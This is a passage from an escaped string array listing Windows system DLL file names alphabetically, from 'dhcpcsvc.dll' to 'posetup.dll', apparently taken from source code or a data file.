\"dhcpcsvc.dll\", \"dhcpcsvc6.dll\", \"dhcpsapi.dll\", \"diagcpl.dll\", \"diagnosticlogcsp.dll\", \"diagperf.dll\", \"diagsvc.dll\", \"diagtrack.dll\", \"dialclient.dll\", \"dialserver.dll\", \"dictationmanager.dll\", \"difxapi.dll\", \"dimsjob.dll\", \"dimsroam.dll\", \"dinput.dll\", \"dinput8.dll\", \"direct2ddesktop.dll\", \"directml.dll\", \"discan.dll\", \"dismapi.dll\", \"dispbroker.dll\", \"dispex.dll\", \"display.dll\", \"displaymanager.dll\", \"dlnashext.dll\", \"dmappsres.dll\", \"dmcfgutils.dll\", \"dmcmnutils.dll\", \"dmcsps.dll\", \"dmdlgs.dll\", \"dmdskmgr.dll\", \"dmdskres.dll\", \"dmdskres2.dll\", \"dmenrollengine.dll\", \"dmintf.dll\", \"dmiso8601utils.dll\", \"dmloader.dll\", \"dmocx.dll\", \"dmoleaututils.dll\", \"dmpushproxy.dll\", \"dmpushroutercore.dll\", \"dmrcdecoder.dll\", \"dmrserver.dll\", \"dmsynth.dll\", \"dmusic.dll\", \"dmutil.dll\", \"dmvdsitf.dll\", \"dmwappushsvc.dll\", \"dmwmicsp.dll\", \"dmxmlhelputils.dll\", \"dnsapi.dll\", \"dnscmmc.dll\", \"dnsext.dll\", \"dnshc.dll\", \"dnsrslvr.dll\", \"docprop.dll\", \"dolbydecmft.dll\", \"domgmt.dll\", \"dosettings.dll\", \"dosvc.dll\", \"dot3api.dll\", \"dot3cfg.dll\", \"dot3conn.dll\", \"dot3dlg.dll\", \"dot3gpclnt.dll\", \"dot3gpui.dll\", \"dot3hc.dll\", \"dot3mm.dll\", \"dot3msm.dll\", \"dot3svc.dll\", \"dot3ui.dll\", \"dpapi.dll\", \"dpapiprovider.dll\", \"dpapisrv.dll\", \"dpnaddr.dll\", \"dpnathlp.dll\", \"dpnet.dll\", \"dpnhpast.dll\", \"dpnhupnp.dll\", \"dpnlobby.dll\", \"dps.dll\", \"dpx.dll\", \"drprov.dll\", \"drt.dll\", \"drtprov.dll\", \"drttransport.dll\", \"drvsetup.dll\", \"drvstore.dll\", \"dsauth.dll\", \"dsccore.dll\", \"dsccoreconfprov.dll\", \"dsclient.dll\", \"dscproxy.dll\", \"dsctimer.dll\", \"dsdmo.dll\", \"dskquota.dll\", \"dskquoui.dll\", \"dsound.dll\", \"dsparse.dll\", \"dsprop.dll\", \"dsquery.dll\", \"dsreg.dll\", \"dsregtask.dll\", \"dsrole.dll\", \"dssec.dll\", \"dssenh.dll\", \"dssvc.dll\", \"dsui.dll\", \"dsuiext.dll\", \"dswave.dll\", \"dtsh.dll\", 
\"ducsps.dll\", \"dui70.dll\", \"duser.dll\", \"dusmapi.dll\", \"dusmsvc.dll\", \"dwmapi.dll\", \"dwmcore.dll\", \"dwmghost.dll\", \"dwminit.dll\", \"dwmredir.dll\", \"dwmscene.dll\", \"dwrite.dll\", \"dxcore.dll\", \"dxdiagn.dll\", \"dxgi.dll\", \"dxgwdi.dll\", \"dxilconv.dll\", \"dxmasf.dll\", \"dxp.dll\", \"dxpps.dll\", \"dxptasksync.dll\", \"dxtmsft.dll\", \"dxtrans.dll\", \"dxva2.dll\", \"dynamoapi.dll\", \"eapp3hst.dll\", \"eappcfg.dll\", \"eappcfgui.dll\", \"eappgnui.dll\", \"eapphost.dll\", \"eappprxy.dll\", \"eapprovp.dll\", \"eapputil.dll\", \"eapsimextdesktop.dll\", \"eapsvc.dll\", \"eapteapauth.dll\", \"eapteapconfig.dll\", \"eapteapext.dll\", \"easconsent.dll\", \"easwrt.dll\", \"edgeangle.dll\", \"edgecontent.dll\", \"edgehtml.dll\", \"edgeiso.dll\", \"edgemanager.dll\", \"edpauditapi.dll\", \"edpcsp.dll\", \"edptask.dll\", \"edputil.dll\", \"eeprov.dll\", \"eeutil.dll\", \"efsadu.dll\", \"efscore.dll\", \"efsext.dll\", \"efslsaext.dll\", \"efssvc.dll\", \"efsutil.dll\", \"efswrt.dll\", \"ehstorapi.dll\", \"ehstorpwdmgr.dll\", \"ehstorshell.dll\", \"els.dll\", \"elscore.dll\", \"elshyph.dll\", \"elslad.dll\", \"elstrans.dll\", \"emailapis.dll\", \"embeddedmodesvc.dll\", \"emojids.dll\", \"encapi.dll\", \"energy.dll\", \"energyprov.dll\", \"energytask.dll\", \"enrollmentapi.dll\", \"enterpriseapncsp.dll\", \"enterprisecsps.dll\", \"enterpriseetw.dll\", \"eqossnap.dll\", \"errordetails.dll\", \"errordetailscore.dll\", \"es.dll\", \"esclprotocol.dll\", \"esclscan.dll\", \"esclwiadriver.dll\", \"esdsip.dll\", \"esent.dll\", \"esentprf.dll\", \"esevss.dll\", \"eshims.dll\", \"etwrundown.dll\", \"euiccscsp.dll\", \"eventaggregation.dll\", \"eventcls.dll\", \"evr.dll\", \"execmodelclient.dll\", \"execmodelproxy.dll\", \"explorerframe.dll\", \"exsmime.dll\", \"extrasxmlparser.dll\", \"f3ahvoas.dll\", \"facilitator.dll\", \"familysafetyext.dll\", \"faultrep.dll\", \"fcon.dll\", \"fdbth.dll\", \"fdbthproxy.dll\", \"fddevquery.dll\", \"fde.dll\", 
\"fdeploy.dll\", \"fdphost.dll\", \"fdpnp.dll\", \"fdprint.dll\", \"fdproxy.dll\", \"fdrespub.dll\", \"fdssdp.dll\", \"fdwcn.dll\", \"fdwnet.dll\", \"fdwsd.dll\", \"feclient.dll\", \"ffbroker.dll\", \"fhcat.dll\", \"fhcfg.dll\", \"fhcleanup.dll\", \"fhcpl.dll\", \"fhengine.dll\", \"fhevents.dll\", \"fhshl.dll\", \"fhsrchapi.dll\", \"fhsrchph.dll\", \"fhsvc.dll\", \"fhsvcctl.dll\", \"fhtask.dll\", \"fhuxadapter.dll\", \"fhuxapi.dll\", \"fhuxcommon.dll\", \"fhuxgraphics.dll\", \"fhuxpresentation.dll\", \"fidocredprov.dll\", \"filemgmt.dll\", \"filterds.dll\", \"findnetprinters.dll\", \"firewallapi.dll\", \"flightsettings.dll\", \"fltlib.dll\", \"fluencyds.dll\", \"fmapi.dll\", \"fmifs.dll\", \"fms.dll\", \"fntcache.dll\", \"fontext.dll\", \"fontprovider.dll\", \"fontsub.dll\", \"fphc.dll\", \"framedyn.dll\", \"framedynos.dll\", \"frameserver.dll\", \"frprov.dll\", \"fsutilext.dll\", \"fthsvc.dll\", \"fundisc.dll\", \"fveapi.dll\", \"fveapibase.dll\", \"fvecerts.dll\", \"fvecpl.dll\", \"fveskybackup.dll\", \"fveui.dll\", \"fvewiz.dll\", \"fwbase.dll\", \"fwcfg.dll\", \"fwmdmcsp.dll\", \"fwpolicyiomgr.dll\", \"fwpuclnt.dll\", \"fwremotesvr.dll\", \"gameinput.dll\", \"gamemode.dll\", \"gamestreamingext.dll\", \"gameux.dll\", \"gamingtcui.dll\", \"gcdef.dll\", \"gdi32.dll\", \"gdi32full.dll\", \"gdiplus.dll\", \"generaltel.dll\", \"geocommon.dll\", \"geolocation.dll\", \"getuname.dll\", \"glmf32.dll\", \"globinputhost.dll\", \"glu32.dll\", \"gmsaclient.dll\", \"gpapi.dll\", \"gpcsewrappercsp.dll\", \"gpedit.dll\", \"gpprefcl.dll\", \"gpprnext.dll\", \"gpscript.dll\", \"gpsvc.dll\", \"gptext.dll\", \"graphicscapture.dll\", \"graphicsperfsvc.dll\", \"groupinghc.dll\", \"hal.dll\", \"halextpl080.dll\", \"hascsp.dll\", \"hashtagds.dll\", \"hbaapi.dll\", \"hcproviders.dll\", \"hdcphandler.dll\", \"heatcore.dll\", \"helppaneproxy.dll\", \"hgcpl.dll\", \"hhsetup.dll\", \"hid.dll\", \"hidcfu.dll\", \"hidserv.dll\", \"hlink.dll\", \"hmkd.dll\", \"hnetcfg.dll\", 
\"hnetcfgclient.dll\", \"hnetmon.dll\", \"hologramworld.dll\", \"holoshellruntime.dll\", \"holoshextensions.dll\", \"hotplug.dll\", \"hrtfapo.dll\", \"httpapi.dll\", \"httpprxc.dll\", \"httpprxm.dll\", \"httpprxp.dll\", \"httpsdatasource.dll\", \"htui.dll\", \"hvhostsvc.dll\", \"hvloader.dll\", \"hvsigpext.dll\", \"hvsocket.dll\", \"hydrogen.dll\", \"ia2comproxy.dll\", \"ias.dll\", \"iasacct.dll\", \"iasads.dll\", \"iasdatastore.dll\", \"iashlpr.dll\", \"iasmigplugin.dll\", \"iasnap.dll\", \"iaspolcy.dll\", \"iasrad.dll\", \"iasrecst.dll\", \"iassam.dll\", \"iassdo.dll\", \"iassvcs.dll\", \"icfupgd.dll\", \"icm32.dll\", \"icmp.dll\", \"icmui.dll\", \"iconcodecservice.dll\", \"icsigd.dll\", \"icsvc.dll\", \"icsvcext.dll\", \"icu.dll\", \"icuin.dll\", \"icuuc.dll\", \"idctrls.dll\", \"idlisten.dll\", \"idndl.dll\", \"idstore.dll\", \"ieadvpack.dll\", \"ieapfltr.dll\", \"iedkcs32.dll\", \"ieframe.dll\", \"iemigplugin.dll\", \"iepeers.dll\", \"ieproxy.dll\", \"iernonce.dll\", \"iertutil.dll\", \"iesetup.dll\", \"iesysprep.dll\", \"ieui.dll\", \"ifmon.dll\", \"ifsutil.dll\", \"ifsutilx.dll\", \"igddiag.dll\", \"ihds.dll\", \"ikeext.dll\", \"imagehlp.dll\", \"imageres.dll\", \"imagesp1.dll\", \"imapi.dll\", \"imapi2.dll\", \"imapi2fs.dll\", \"imgutil.dll\", \"imm32.dll\", \"implatsetup.dll\", \"indexeddblegacy.dll\", \"inetcomm.dll\", \"inetmib1.dll\", \"inetpp.dll\", \"inetppui.dll\", \"inetres.dll\", \"inked.dll\", \"inkobjcore.dll\", \"inproclogger.dll\", \"input.dll\", \"inputcloudstore.dll\", \"inputcontroller.dll\", \"inputhost.dll\", \"inputservice.dll\", \"inputswitch.dll\", \"inseng.dll\", \"installservice.dll\", \"internetmail.dll\", \"internetmailcsp.dll\", \"invagent.dll\", \"iologmsg.dll\", \"iphlpapi.dll\", \"iphlpsvc.dll\", \"ipnathlp.dll\", \"ipnathlpclient.dll\", \"ippcommon.dll\", \"ippcommonproxy.dll\", \"iprtprio.dll\", \"iprtrmgr.dll\", \"ipsecsnp.dll\", \"ipsecsvc.dll\", \"ipsmsnap.dll\", \"ipxlatcfg.dll\", \"iri.dll\", \"iscsicpl.dll\", 
\"iscsidsc.dll\", \"iscsied.dll\", \"iscsiexe.dll\", \"iscsilog.dll\", \"iscsium.dll\", \"iscsiwmi.dll\", \"iscsiwmiv2.dll\", \"ism.dll\", \"itircl.dll\", \"itss.dll\", \"iuilp.dll\", \"iumbase.dll\", \"iumcrypt.dll\", \"iumdll.dll\", \"iumsdk.dll\", \"iyuv_32.dll\", \"joinproviderol.dll\", \"joinutil.dll\", \"jpmapcontrol.dll\", \"jpndecoder.dll\", \"jpninputrouter.dll\", \"jpnranker.dll\", \"jpnserviceds.dll\", \"jscript.dll\", \"jscript9.dll\", \"jscript9diag.dll\", \"jsproxy.dll\", \"kbd101.dll\", \"kbd101a.dll\", \"kbd101b.dll\", \"kbd101c.dll\", \"kbd103.dll\", \"kbd106.dll\", \"kbd106n.dll\", \"kbda1.dll\", \"kbda2.dll\", \"kbda3.dll\", \"kbdadlm.dll\", \"kbdal.dll\", \"kbdarme.dll\", \"kbdarmph.dll\", \"kbdarmty.dll\", \"kbdarmw.dll\", \"kbdax2.dll\", \"kbdaze.dll\", \"kbdazel.dll\", \"kbdazst.dll\", \"kbdbash.dll\", \"kbdbe.dll\", \"kbdbene.dll\", \"kbdbgph.dll\", \"kbdbgph1.dll\", \"kbdbhc.dll\", \"kbdblr.dll\", \"kbdbr.dll\", \"kbdbu.dll\", \"kbdbug.dll\", \"kbdbulg.dll\", \"kbdca.dll\", \"kbdcan.dll\", \"kbdcher.dll\", \"kbdcherp.dll\", \"kbdcr.dll\", \"kbdcz.dll\", \"kbdcz1.dll\", \"kbdcz2.dll\", \"kbdda.dll\", \"kbddiv1.dll\", \"kbddiv2.dll\", \"kbddv.dll\", \"kbddzo.dll\", \"kbdes.dll\", \"kbdest.dll\", \"kbdfa.dll\", \"kbdfar.dll\", \"kbdfc.dll\", \"kbdfi.dll\", \"kbdfi1.dll\", \"kbdfo.dll\", \"kbdfr.dll\", \"kbdfthrk.dll\", \"kbdgae.dll\", \"kbdgeo.dll\", \"kbdgeoer.dll\", \"kbdgeome.dll\", \"kbdgeooa.dll\", \"kbdgeoqw.dll\", \"kbdgkl.dll\", \"kbdgn.dll\", \"kbdgr.dll\", \"kbdgr1.dll\", \"kbdgrlnd.dll\", \"kbdgthc.dll\", \"kbdhau.dll\", \"kbdhaw.dll\", \"kbdhe.dll\", \"kbdhe220.dll\", \"kbdhe319.dll\", \"kbdheb.dll\", \"kbdhebl3.dll\", \"kbdhela2.dll\", \"kbdhela3.dll\", \"kbdhept.dll\", \"kbdhu.dll\", \"kbdhu1.dll\", \"kbdibm02.dll\", \"kbdibo.dll\", \"kbdic.dll\", \"kbdinasa.dll\", \"kbdinbe1.dll\", \"kbdinbe2.dll\", \"kbdinben.dll\", \"kbdindev.dll\", \"kbdinen.dll\", \"kbdinguj.dll\", \"kbdinhin.dll\", \"kbdinkan.dll\", \"kbdinmal.dll\", 
\"kbdinmar.dll\", \"kbdinori.dll\", \"kbdinpun.dll\", \"kbdintam.dll\", \"kbdintel.dll\", \"kbdinuk2.dll\", \"kbdir.dll\", \"kbdit.dll\", \"kbdit142.dll\", \"kbdiulat.dll\", \"kbdjav.dll\", \"kbdjpn.dll\", \"kbdkaz.dll\", \"kbdkhmr.dll\", \"kbdkni.dll\", \"kbdkor.dll\", \"kbdkurd.dll\", \"kbdkyr.dll\", \"kbdla.dll\", \"kbdlao.dll\", \"kbdlisub.dll\", \"kbdlisus.dll\", \"kbdlk41a.dll\", \"kbdlt.dll\", \"kbdlt1.dll\", \"kbdlt2.dll\", \"kbdlv.dll\", \"kbdlv1.dll\", \"kbdlvst.dll\", \"kbdmac.dll\", \"kbdmacst.dll\", \"kbdmaori.dll\", \"kbdmlt47.dll\", \"kbdmlt48.dll\", \"kbdmon.dll\", \"kbdmonmo.dll\", \"kbdmonst.dll\", \"kbdmyan.dll\", \"kbdne.dll\", \"kbdnec.dll\", \"kbdnec95.dll\", \"kbdnecat.dll\", \"kbdnecnt.dll\", \"kbdnepr.dll\", \"kbdnko.dll\", \"kbdno.dll\", \"kbdno1.dll\", \"kbdnso.dll\", \"kbdntl.dll\", \"kbdogham.dll\", \"kbdolch.dll\", \"kbdoldit.dll\", \"kbdosa.dll\", \"kbdosm.dll\", \"kbdpash.dll\", \"kbdphags.dll\", \"kbdpl.dll\", \"kbdpl1.dll\", \"kbdpo.dll\", \"kbdro.dll\", \"kbdropr.dll\", \"kbdrost.dll\", \"kbdru.dll\", \"kbdru1.dll\", \"kbdrum.dll\", \"kbdsf.dll\", \"kbdsg.dll\", \"kbdsl.dll\", \"kbdsl1.dll\", \"kbdsmsfi.dll\", \"kbdsmsno.dll\", \"kbdsn1.dll\", \"kbdsora.dll\", \"kbdsorex.dll\", \"kbdsors1.dll\", \"kbdsorst.dll\", \"kbdsp.dll\", \"kbdsw.dll\", \"kbdsw09.dll\", \"kbdsyr1.dll\", \"kbdsyr2.dll\", \"kbdtaile.dll\", \"kbdtajik.dll\", \"kbdtam99.dll\", \"kbdtat.dll\", \"kbdth0.dll\", \"kbdth1.dll\", \"kbdth2.dll\", \"kbdth3.dll\", \"kbdtifi.dll\", \"kbdtifi2.dll\", \"kbdtiprc.dll\", \"kbdtiprd.dll\", \"kbdtt102.dll\", \"kbdtuf.dll\", \"kbdtuq.dll\", \"kbdturme.dll\", \"kbdtzm.dll\", \"kbdughr.dll\", \"kbdughr1.dll\", \"kbduk.dll\", \"kbdukx.dll\", \"kbdur.dll\", \"kbdur1.dll\", \"kbdurdu.dll\", \"kbdus.dll\", \"kbdusa.dll\", \"kbdusl.dll\", \"kbdusr.dll\", \"kbdusx.dll\", \"kbduzb.dll\", \"kbdvntc.dll\", \"kbdwol.dll\", \"kbdyak.dll\", \"kbdyba.dll\", \"kbdycc.dll\", \"kbdycl.dll\", \"kd.dll\", \"kdcom.dll\", \"kdcpw.dll\", 
\"kdhvcom.dll\", \"kdnet.dll\", \"kdnet_uart16550.dll\", \"kdscli.dll\", \"kdstub.dll\", \"kdusb.dll\", \"kd_02_10df.dll\", \"kd_02_10ec.dll\", \"kd_02_1137.dll\", \"kd_02_14e4.dll\", \"kd_02_15b3.dll\", \"kd_02_1969.dll\", \"kd_02_19a2.dll\", \"kd_02_1af4.dll\", \"kd_02_8086.dll\", \"kd_07_1415.dll\", \"kd_0c_8086.dll\", \"kerbclientshared.dll\", \"kerberos.dll\", \"kernel32.dll\", \"kernelbase.dll\", \"keycredmgr.dll\", \"keyiso.dll\", \"keymgr.dll\", \"knobscore.dll\", \"knobscsp.dll\", \"ksuser.dll\", \"ktmw32.dll\", \"l2gpstore.dll\", \"l2nacp.dll\", \"l2sechc.dll\", \"laprxy.dll\", \"legacynetux.dll\", \"lfsvc.dll\", \"libcrypto.dll\", \"licensemanager.dll\", \"licensingcsp.dll\", \"licensingdiagspp.dll\", \"licensingwinrt.dll\", \"licmgr10.dll\", \"linkinfo.dll\", \"lltdapi.dll\", \"lltdres.dll\", \"lltdsvc.dll\", \"lmhsvc.dll\", \"loadperf.dll\", \"localsec.dll\", \"localspl.dll\", \"localui.dll\", \"locationapi.dll\", \"lockappbroker.dll\", \"lockcontroller.dll\", \"lockscreendata.dll\", \"loghours.dll\", \"logoncli.dll\", \"logoncontroller.dll\", \"lpasvc.dll\", \"lpk.dll\", \"lsasrv.dll\", \"lscshostpolicy.dll\", \"lsm.dll\", \"lsmproxy.dll\", \"lstelemetry.dll\", \"luainstall.dll\", \"luiapi.dll\", \"lz32.dll\", \"magnification.dll\", \"maintenanceui.dll\", \"manageci.dll\", \"mapconfiguration.dll\", \"mapcontrolcore.dll\", \"mapgeocoder.dll\", \"mapi32.dll\", \"mapistub.dll\", \"maprouter.dll\", \"mapsbtsvc.dll\", \"mapsbtsvcproxy.dll\", \"mapscsp.dll\", \"mapsstore.dll\", \"mapstoasttask.dll\", \"mapsupdatetask.dll\", \"mbaeapi.dll\", \"mbaeapipublic.dll\", \"mbaexmlparser.dll\", \"mbmediamanager.dll\", \"mbsmsapi.dll\", \"mbussdapi.dll\", \"mccsengineshared.dll\", \"mccspal.dll\", \"mciavi32.dll\", \"mcicda.dll\", \"mciqtz32.dll\", \"mciseq.dll\", \"mciwave.dll\", \"mcrecvsrc.dll\", \"mdmcommon.dll\", \"mdmdiagnostics.dll\", \"mdminst.dll\", \"mdmmigrator.dll\", \"mdmregistration.dll\", \"memorydiagnostic.dll\", \"messagingservice.dll\", \"mf.dll\", 
\"mf3216.dll\", \"mfaacenc.dll\", \"mfasfsrcsnk.dll\", \"mfaudiocnv.dll\", \"mfc42.dll\", \"mfc42u.dll\", \"mfcaptureengine.dll\", \"mfcore.dll\", \"mfcsubs.dll\", \"mfds.dll\", \"mfdvdec.dll\", \"mferror.dll\", \"mfh263enc.dll\", \"mfh264enc.dll\", \"mfksproxy.dll\", \"mfmediaengine.dll\", \"mfmjpegdec.dll\", \"mfmkvsrcsnk.dll\", \"mfmp4srcsnk.dll\", \"mfmpeg2srcsnk.dll\", \"mfnetcore.dll\", \"mfnetsrc.dll\", \"mfperfhelper.dll\", \"mfplat.dll\", \"mfplay.dll\", \"mfps.dll\", \"mfreadwrite.dll\", \"mfsensorgroup.dll\", \"mfsrcsnk.dll\", \"mfsvr.dll\", \"mftranscode.dll\", \"mfvdsp.dll\", \"mfvfw.dll\", \"mfwmaaec.dll\", \"mgmtapi.dll\", \"mi.dll\", \"mibincodec.dll\", \"midimap.dll\", \"migisol.dll\", \"miguiresource.dll\", \"mimefilt.dll\", \"mimofcodec.dll\", \"minstoreevents.dll\", \"miracastinputmgr.dll\", \"miracastreceiver.dll\", \"mirrordrvcompat.dll\", \"mispace.dll\", \"mitigationclient.dll\", \"miutils.dll\", \"mlang.dll\", \"mmcbase.dll\", \"mmcndmgr.dll\", \"mmcshext.dll\", \"mmdevapi.dll\", \"mmgaclient.dll\", \"mmgaproxystub.dll\", \"mmres.dll\", \"mobilenetworking.dll\", \"modemui.dll\", \"modernexecserver.dll\", \"moricons.dll\", \"moshost.dll\", \"moshostclient.dll\", \"moshostcore.dll\", \"mosstorage.dll\", \"mp3dmod.dll\", \"mp43decd.dll\", \"mp4sdecd.dll\", \"mpeval.dll\", \"mpg4decd.dll\", \"mpr.dll\", \"mprapi.dll\", \"mprddm.dll\", \"mprdim.dll\", \"mprext.dll\", \"mprmsg.dll\", \"mpssvc.dll\", \"mpunits.dll\", \"mrmcorer.dll\", \"mrmdeploy.dll\", \"mrmindexer.dll\", \"mrt100.dll\", \"mrt_map.dll\", \"msaatext.dll\", \"msac3enc.dll\", \"msacm32.dll\", \"msafd.dll\", \"msajapi.dll\", \"msalacdecoder.dll\", \"msalacencoder.dll\", \"msamrnbdecoder.dll\", \"msamrnbencoder.dll\", \"msamrnbsink.dll\", \"msamrnbsource.dll\", \"msasn1.dll\", \"msauddecmft.dll\", \"msaudite.dll\", \"msauserext.dll\", \"mscandui.dll\", \"mscat32.dll\", \"msclmd.dll\", \"mscms.dll\", \"mscoree.dll\", \"mscorier.dll\", \"mscories.dll\", \"msctf.dll\", 
\"msctfmonitor.dll\", \"msctfp.dll\", \"msctfui.dll\", \"msctfuimanager.dll\", \"msdadiag.dll\", \"msdart.dll\", \"msdelta.dll\", \"msdmo.dll\", \"msdrm.dll\", \"msdtckrm.dll\", \"msdtclog.dll\", \"msdtcprx.dll\", \"msdtcspoffln.dll\", \"msdtctm.dll\", \"msdtcuiu.dll\", \"msdtcvsp1res.dll\", \"msfeeds.dll\", \"msfeedsbs.dll\", \"msflacdecoder.dll\", \"msflacencoder.dll\", \"msftedit.dll\", \"msheif.dll\", \"mshtml.dll\", \"mshtmldac.dll\", \"mshtmled.dll\", \"mshtmler.dll\", \"msi.dll\", \"msicofire.dll\", \"msidcrl40.dll\", \"msident.dll\", \"msidle.dll\", \"msidntld.dll\", \"msieftp.dll\", \"msihnd.dll\", \"msiltcfg.dll\", \"msimg32.dll\", \"msimsg.dll\", \"msimtf.dll\", \"msisip.dll\", \"msiso.dll\", \"msiwer.dll\", \"mskeyprotcli.dll\", \"mskeyprotect.dll\", \"msls31.dll\", \"msmpeg2adec.dll\", \"msmpeg2enc.dll\", \"msmpeg2vdec.dll\", \"msobjs.dll\", \"msoert2.dll\", \"msopusdecoder.dll\", \"mspatcha.dll\", \"mspatchc.dll\", \"msphotography.dll\", \"msports.dll\", \"msprivs.dll\", \"msrahc.dll\", \"msrating.dll\", \"msrawimage.dll\", \"msrdc.dll\", \"msrdpwebaccess.dll\", \"msrle32.dll\", \"msscntrs.dll\", \"mssecuser.dll\", \"mssign32.dll\", \"mssip32.dll\", \"mssitlb.dll\", \"mssph.dll\", \"mssprxy.dll\", \"mssrch.dll\", \"mssvp.dll\", \"mstask.dll\", \"mstextprediction.dll\", \"mstscax.dll\", \"msutb.dll\", \"msv1_0.dll\", \"msvcirt.dll\", \"msvcp110_win.dll\", \"msvcp120_clr0400.dll\", \"msvcp140_clr0400.dll\", \"msvcp60.dll\", \"msvcp_win.dll\", \"msvcr100_clr0400.dll\", \"msvcr120_clr0400.dll\", \"msvcrt.dll\", \"msvfw32.dll\", \"msvidc32.dll\", \"msvidctl.dll\", \"msvideodsp.dll\", \"msvp9dec.dll\", \"msvproc.dll\", \"msvpxenc.dll\", \"mswb7.dll\", \"mswebp.dll\", \"mswmdm.dll\", \"mswsock.dll\", \"msxml3.dll\", \"msxml3r.dll\", \"msxml6.dll\", \"msxml6r.dll\", \"msyuv.dll\", \"mtcmodel.dll\", \"mtf.dll\", \"mtfappserviceds.dll\", \"mtfdecoder.dll\", \"mtffuzzyds.dll\", \"mtfserver.dll\", \"mtfspellcheckds.dll\", \"mtxclu.dll\", \"mtxdm.dll\", 
\"mtxex.dll\", \"mtxoci.dll\", \"muifontsetup.dll\", \"mycomput.dll\", \"mydocs.dll\", \"napcrypt.dll\", \"napinsp.dll\", \"naturalauth.dll\", \"naturallanguage6.dll\", \"navshutdown.dll\", \"ncaapi.dll\", \"ncasvc.dll\", \"ncbservice.dll\", \"ncdautosetup.dll\", \"ncdprop.dll\", \"nci.dll\", \"ncobjapi.dll\", \"ncrypt.dll\", \"ncryptprov.dll\", \"ncryptsslp.dll\", \"ncsi.dll\", \"ncuprov.dll\", \"nddeapi.dll\", \"ndfapi.dll\", \"ndfetw.dll\", \"ndfhcdiscovery.dll\", \"ndishc.dll\", \"ndproxystub.dll\", \"nduprov.dll\", \"negoexts.dll\", \"netapi32.dll\", \"netbios.dll\", \"netcenter.dll\", \"netcfgx.dll\", \"netcorehc.dll\", \"netdiagfx.dll\", \"netdriverinstall.dll\", \"netevent.dll\", \"netfxperf.dll\", \"neth.dll\", \"netid.dll\", \"netiohlp.dll\", \"netjoin.dll\", \"netlogon.dll\", \"netman.dll\", \"netmsg.dll\", \"netplwiz.dll\", \"netprofm.dll\", \"netprofmsvc.dll\", \"netprovfw.dll\", \"netprovisionsp.dll\", \"netsetupapi.dll\", \"netsetupengine.dll\", \"netsetupshim.dll\", \"netsetupsvc.dll\", \"netshell.dll\", \"nettrace.dll\", \"netutils.dll\", \"networkexplorer.dll\", \"networkhelper.dll\", \"networkicon.dll\", \"networkproxycsp.dll\", \"networkstatus.dll\", \"networkuxbroker.dll\", \"newdev.dll\", \"nfcradiomedia.dll\", \"ngccredprov.dll\", \"ngcctnr.dll\", \"ngcctnrsvc.dll\", \"ngcisoctnr.dll\", \"ngckeyenum.dll\", \"ngcksp.dll\", \"ngclocal.dll\", \"ngcpopkeysrv.dll\", \"ngcprocsp.dll\", \"ngcrecovery.dll\", \"ngcsvc.dll\", \"ngctasks.dll\", \"ninput.dll\", \"nlaapi.dll\", \"nlahc.dll\", \"nlasvc.dll\", \"nlhtml.dll\", \"nlmgp.dll\", \"nlmproxy.dll\", \"nlmsprep.dll\", \"nlsbres.dll\", \"nlsdata0000.dll\", \"nlsdata0009.dll\", \"nlsdl.dll\", \"nlslexicons0009.dll\", \"nmadirect.dll\", \"normaliz.dll\", \"npmproxy.dll\", \"npsm.dll\", \"nrpsrv.dll\", \"nshhttp.dll\", \"nshipsec.dll\", \"nshwfp.dll\", \"nsi.dll\", \"nsisvc.dll\", \"ntasn1.dll\", \"ntdll.dll\", \"ntdsapi.dll\", \"ntlanman.dll\", \"ntlanui2.dll\", \"ntlmshared.dll\", \"ntmarta.dll\", 
\"ntprint.dll\", \"ntshrui.dll\", \"ntvdm64.dll\", \"objsel.dll\", \"occache.dll\", \"ocsetapi.dll\", \"odbc32.dll\", \"odbcbcp.dll\", \"odbcconf.dll\", \"odbccp32.dll\", \"odbccr32.dll\", \"odbccu32.dll\", \"odbcint.dll\", \"odbctrac.dll\", \"oemlicense.dll\", \"offfilt.dll\", \"officecsp.dll\", \"offlinelsa.dll\", \"offlinesam.dll\", \"offreg.dll\", \"ole32.dll\", \"oleacc.dll\", \"oleacchooks.dll\", \"oleaccrc.dll\", \"oleaut32.dll\", \"oledlg.dll\", \"oleprn.dll\", \"omadmagent.dll\", \"omadmapi.dll\", \"onebackuphandler.dll\", \"onex.dll\", \"onexui.dll\", \"opcservices.dll\", \"opengl32.dll\", \"ortcengine.dll\", \"osbaseln.dll\", \"osksupport.dll\", \"osuninst.dll\", \"p2p.dll\", \"p2pgraph.dll\", \"p2pnetsh.dll\", \"p2psvc.dll\", \"packager.dll\", \"panmap.dll\", \"pautoenr.dll\", \"pcacli.dll\", \"pcadm.dll\", \"pcaevts.dll\", \"pcasvc.dll\", \"pcaui.dll\", \"pcpksp.dll\", \"pcsvdevice.dll\", \"pcwum.dll\", \"pcwutl.dll\", \"pdh.dll\", \"pdhui.dll\", \"peerdist.dll\", \"peerdistad.dll\", \"peerdistcleaner.dll\", \"peerdistsh.dll\", \"peerdistsvc.dll\", \"peopleapis.dll\", \"peopleband.dll\", \"perceptiondevice.dll\", \"perfctrs.dll\", \"perfdisk.dll\", \"perfnet.dll\", \"perfos.dll\", \"perfproc.dll\", \"perfts.dll\", \"phoneom.dll\", \"phoneproviders.dll\", \"phoneservice.dll\", \"phoneserviceres.dll\", \"phoneutil.dll\", \"phoneutilres.dll\", \"photowiz.dll\", \"pickerplatform.dll\", \"pid.dll\", \"pidgenx.dll\", \"pifmgr.dll\", \"pimstore.dll\", \"pkeyhelper.dll\", \"pktmonapi.dll\", \"pku2u.dll\", \"pla.dll\", \"playlistfolder.dll\", \"playsndsrv.dll\", \"playtodevice.dll\", \"playtomanager.dll\", \"playtomenu.dll\", \"playtoreceiver.dll\", \"ploptin.dll\", \"pmcsnap.dll\", \"pngfilt.dll\", \"pnidui.dll\", \"pnpclean.dll\", \"pnppolicy.dll\", \"pnpts.dll\", \"pnpui.dll\", \"pnpxassoc.dll\", \"pnpxassocprx.dll\", \"pnrpauto.dll\", \"pnrphc.dll\", \"pnrpnsp.dll\", \"pnrpsvc.dll\", \"policymanager.dll\", \"polstore.dll\", \"posetup.dll\", 
